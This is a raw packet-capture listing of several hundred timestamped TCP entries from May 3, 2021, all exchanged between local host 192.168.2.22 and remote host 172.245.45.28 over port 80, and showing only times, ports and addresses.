May 3, 2021 10:44:30.255142927 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255151033 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255162954 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255167007 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255183935 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255196095 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255198956 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255214930 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255215883 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255232096 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255232096 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255250931 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255264044 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255268097 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255270004 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255280018 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255286932 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255301952 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255306005 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255319118 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255322933 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255336046 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255337954 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255352974 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255352974 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255367041 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255368948 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255383015 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255389929 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255402088 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255409002 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255439043 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255440950 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255445004 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255458117 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255470037 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255482912 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255495071 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255508900 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255525112 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255541086 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255553007 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255557060 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255558968 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255569935 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255573034 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255588055 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255593061 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255604029 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255610943 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255619049 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255626917 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255642891 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255645990 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255660057 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255660057 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255675077 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255676985 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255693913 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255696058 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255711079 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255717993 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255733967 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255734921 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255749941 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255752087 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255765915 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255767107 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255784035 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255789042 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255800009 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255806923 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255817890 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255822897 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255836010 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255841017 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255856991 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255863905 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255873919 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255876064 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255889893 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255889893 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255907059 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255908012 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255928040 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255929947 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255948067 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255949974 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255964994 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255965948 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255980968 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.255983114 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255997896 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.255999088 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.256014109 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.256016016 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.256030083 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.256033897 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.256047010 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.256051064 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.256062984 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.256071091 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.256078005 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.256088972 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.256112099 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.256124020 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.427143097 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.427170992 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.427200079 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.427212954 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.427229881 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.427247047 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.427263975 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.427282095 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.427299023 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.427319050 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.427337885 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.427355051 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.427371979 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.427387953 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.427386999 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.427407980 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.427418947 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.427423954 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.427427053 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.427427053 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.427429914 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.427439928 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.427444935 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.427464008 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.427467108 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.427480936 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.427486897 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.427504063 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.427505970 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.427520990 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.427521944 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.427534103 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.427537918 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.427552938 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.427556038 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.427568913 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.427573919 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.427586079 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.427591085 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.427611113 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.427614927 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.427623987 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.427629948 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.427639961 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.427647114 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.427666903 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.427679062 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.428200006 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.428247929 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.428257942 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.428267002 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.428284883 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.428286076 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.428301096 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.428317070 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.457587957 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.457619905 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.457632065 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.457649946 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.457669973 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.457688093 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.457703114 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.457720041 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.457736969 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.457752943 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.457770109 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.457783937 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.457786083 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.457809925 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.457813978 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.457818985 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.457822084 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.457823992 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.457829952 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.457848072 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.457848072 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.457865953 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.457870960 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.457880974 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.457889080 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.457906008 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.457909107 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.457923889 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.457925081 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.457942963 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.457943916 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.457957029 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.457964897 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.457974911 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.457983017 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.457998991 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.457999945 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.458015919 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.458018064 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.458034039 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.458035946 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.458050966 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.458055019 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.458066940 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.458074093 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.458091021 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.458098888 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.458112001 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.458112001 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.458125114 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.458132029 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.458143950 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.458148956 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.458159924 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.458167076 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.458184004 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.458188057 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.458201885 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.458204031 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.458218098 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.458221912 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.458235025 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.458240032 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.458250999 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.458261013 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.458268881 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.458281040 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.458295107 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.458297014 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.458312035 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.458317041 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.458331108 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.458334923 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.458345890 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.458354950 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.458364964 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.458370924 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.458388090 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.458389997 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.458409071 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.458410025 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.458420992 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.458429098 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.458446026 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.458447933 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.458463907 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.458466053 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.458481073 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.458496094 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.458520889 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.458538055 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.458559036 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.458571911 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.458571911 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.458610058 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.458668947 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.458688021 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.458703995 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.458708048 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.458720922 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.458723068 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.458739996 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.458739996 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.458754063 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.458758116 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.458770037 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.458775997 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.458786011 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.458792925 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.458813906 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.458813906 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.458827972 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.458832979 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.458843946 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.458851099 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.458859921 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.458868980 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.458885908 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.458888054 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.458903074 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.458904982 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.458918095 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.458920956 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.458935022 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.458940029 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.458954096 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.458960056 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.458980083 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.458983898 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.458993912 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.458997011 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459014893 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459019899 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459028006 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459033966 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459043026 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459050894 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459069014 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459069967 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459081888 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459085941 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459100962 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459108114 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459116936 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459127903 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459145069 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459147930 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459160089 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459161997 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459177017 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459180117 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459194899 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459198952 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459211111 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459217072 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459227085 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459234953 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459254980 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459254980 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459268093 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459274054 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459285021 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459291935 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459309101 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459311008 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459326029 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459326982 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459342957 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459342957 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459357023 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459362030 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459374905 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459379911 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459395885 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459402084 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459405899 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459419966 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459435940 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459436893 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459451914 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459455967 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459470034 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459474087 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459486961 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459492922 CEST	80	49166	172.245.45.28	192.168.2.22
May 3, 2021 10:44:30.459503889 CEST	49166	80	192.168.2.22	172.245.45.28
May 3, 2021 10:44:30.459511995 CEST	80	49166	172.245.45.28	192.168.2.22
